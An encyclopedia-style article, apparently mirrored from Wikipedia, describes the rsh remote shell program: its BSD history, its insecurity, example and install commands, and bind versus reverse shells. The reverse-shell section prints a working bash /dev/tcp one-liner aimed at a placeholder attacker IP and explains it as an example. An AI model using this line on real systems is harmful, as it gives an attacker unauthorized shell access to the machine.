Remote Shell

Last updated
remote shell (rsh)
Initial release1983;41 years ago (1983)
Written in C
Operating system Cross-platform

The remote shell (rsh) is a command-line computer program that can execute shell commands as another user, and on another computer across a computer network.

Contents

The remote system to which rsh connects runs the rsh daemon (rshd). The daemon typically uses the well-known Transmission Control Protocol (TCP) port number 513.

History

Rsh originated as part of the BSD Unix operating system, along with rcp, as part of the rlogin package on 4.2BSD in 1983. rsh has since been ported to other operating systems.

The rsh command has the same name as another common UNIX utility, the restricted shell, which first appeared in PWB/UNIX; in System V Release 4, the restricted shell is often located at /usr/bin/rsh.

As other Berkeley r-commands which involve user authentication, the rsh protocol is not secure for network use, because it sends unencrypted information over the network, among other reasons. Some implementations also authenticate by sending unencrypted passwords over the network. rsh has largely been replaced with the secure shell (ssh) program, even on local networks. [1] [2]

Example

As an example of rsh use, the following executes the command mkdir testdir as user remoteuser on the computer host.example.com running a UNIX-like system:

$ rsh-lremoteuserhost.example.com"mkdir testdir"

After the command has finished rsh terminates. If no command is specified then rsh will log in on the remote system using rlogin. The network location of the remote computer is looked up using the Domain Name System.

Installation

Command to install rsh client using apt

# apt-getinstallrsh-redone-client 

Bind shell and reverse shell

A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed). [3] In the first case remote shell will be called bind shell, in the second case - reverse shell. [4]

Reverse shell can be used when the device on which the command is to be executed is not directly accessible - for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. [5] [6] Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack: [7]

$ exec5<>/dev/tcp/<attacker_IP>/80;cat<&5|whilereadline;do\$line2>&5>&5;done

It opens a TCP socket to attacker IP at port 80 as a file descriptor. It then repeatedly read lines from the socket and run the line, piping both stdout and stderr back to the socket. In other words, it gives the attacker a remote shell on the machine.

See also

Related Research Articles

The Secure Shell (SSH) Protocol is a cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution.

Telnet is a client/server application protocol that provides access to virtual terminals of remote systems on local area networks or the Internet. It is a protocol for bidirectional 8-bit communications. Its main goal was to connect terminal devices and terminal-oriented processes.

<span class="mw-page-title-main">Email client</span> Computer program used to access and manage a users email

An email client, email reader or, more formally, message user agent (MUA) or mail user agent is a computer program used to access and manage a user's email.

Virtual private network (VPN) is a network architecture for virtually extending a private network across one or multiple other networks which are either untrusted or need to be isolated.

An application layer is an abstraction layer that specifies the shared communication protocols and interface methods used by hosts in a communications network. An application layer abstraction is specified in both the Internet Protocol Suite (TCP/IP) and the OSI model. Although both models use the same term for their respective highest-level layer, the detailed definitions and purposes are different.

SOCKS is an Internet protocol that exchanges network packets between a client and server through a proxy server. SOCKS5 optionally provides authentication so only authorized users may access a server. Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded. A SOCKS server accepts incoming client connection on TCP port 1080, as defined in RFC 1928.

Secure copy protocol (SCP) is a means of securely transferring computer files between a local host and a remote host or between two remote hosts. It is based on the Secure Shell (SSH) protocol. "SCP" commonly refers to both the Secure Copy Protocol and the program itself.

<span class="mw-page-title-main">PuTTY</span> Free and open-source terminal emulator, serial console and network file transfer application

PuTTY is a free and open-source terminal emulator, serial console and network file transfer application. It supports several network protocols, including SCP, SSH, Telnet, rlogin, and raw socket connection. It can also connect to a serial port. The name "PuTTY" has no official meaning.

The Berkeley r-commands are a suite of computer programs designed to enable users of one Unix system to log in or issue commands to another Unix computer via TCP/IP computer network. The r-commands were developed in 1982 by the Computer Systems Research Group at the University of California, Berkeley, based on an early implementation of TCP/IP.

<span class="mw-page-title-main">Port forwarding</span> Computer networking feature

In computer networking, port forwarding or port mapping is an application of network address translation (NAT) that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway, such as a router or firewall. This technique is most commonly used to make services on a host residing on a protected or masqueraded (internal) network available to hosts on the opposite side of the gateway, by remapping the destination IP address and port number of the communication to an internal host.

In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s). A variant called single packet authorization (SPA) exists, where only a single "knock" is needed, consisting of an encrypted packet.

FTPS is an extension to the commonly used File Transfer Protocol (FTP) that adds support for the Transport Layer Security (TLS) and, formerly, the Secure Sockets Layer cryptographic protocols.

In computer networks, a tunneling protocol is a communication protocol which allows for the movement of data from one network to another. It can, for example, allow private network communications to be sent across a public network, or for one network protocol to be carried over an incompatible network, through a process called encapsulation.

<span class="mw-page-title-main">Terminal server</span> Device that interfaces serial hosts to a network

A terminal server connects devices with a serial port to a local area network (LAN). Products marketed as terminal servers can be very simple devices that do not offer any security functionality, such as data encryption and user authentication. The primary application scenario is to enable serial devices to access network server applications, or vice versa, where security of the data on the LAN is not generally an issue. There are also many terminal servers on the market that have highly advanced security functionality to ensure that only qualified personnel can access various servers and that any data that is transmitted across the LAN, or over the Internet, is encrypted. Usually, companies that need a terminal server with these advanced functions want to remotely control, monitor, diagnose and troubleshoot equipment over a telecommunications network.

Secure Shell (SSH) is a protocol allowing secure remote login to a computer on a network using public-key cryptography. SSH client programs typically run for the duration of a remote login session and are configured to look for the user's private key in a file in the user's home directory. For added security, it is common to store the private key in an encrypted form, where the encryption key is computed from a passphrase that the user has memorized. Because typing the passphrase can be tedious, many users would prefer to enter it just once per local login session. The most secure place to store the unencrypted key is in program memory, and in Unix-like operating systems, memory is normally associated with a process. A normal SSH client process cannot be used to store the unencrypted key because SSH client processes only last the duration of a remote login session. Therefore, users run a program called ssh-agent that runs beyond the duration of a local login session, stores unencrypted keys in memory, and communicates with SSH clients using a Unix domain socket.

In the X Window System, programs run as X clients, and as such they connect to the X display server, possibly via a computer network. Since the network may be accessible to other users, a method for forbidding access to programs run by users different from the one who is logged in is necessary.

Files transferred over Shell protocol (FISH) is a network protocol that uses Secure Shell (SSH) or Remote Shell (RSH) to transfer files between computers and manage remote files.

<span class="mw-page-title-main">OpenSSH</span> Set of computer programs providing encrypted communication sessions

OpenSSH is a suite of secure networking utilities based on the Secure Shell (SSH) protocol, which provides a secure channel over an unsecured network in a client–server architecture.

The Ident Protocol, specified in RFC 1413, is an Internet protocol that helps identify the user of a particular TCP connection. One popular daemon program for providing the ident service is identd.

References

  1. "SSH, the Secure Shell: The Definitive Guide". www.researchgate.net. Archived from the original on 2023-11-11. Retrieved 2023-11-11.
  2. "Secure Shell Protocol – Everything you need to know". dev.to. Retrieved 2023-11-11.
  3. "Secure Shell (SSH)". www.techtarget.com. Archived from the original on 2023-11-11. Retrieved 2023-11-11.
  4. "Difference Between Bind Shell and Reverse Shell". www.geeksforgeeks.org. Archived from the original on 2023-11-11. Retrieved 2023-11-11.
  5. "What is a Reverse Shell?". www.techslang.com. Retrieved 2023-11-11.
  6. "The Evolution of Remote Shell and the Security Layers of Browser-Based Law Software". www.lawsupport.com.au. Archived from the original on 2023-11-11. Retrieved 2023-11-11.
  7. "What is a Reverse Shell?". Sysdig. Archived from the original on 2023-11-28. Retrieved 2023-11-28.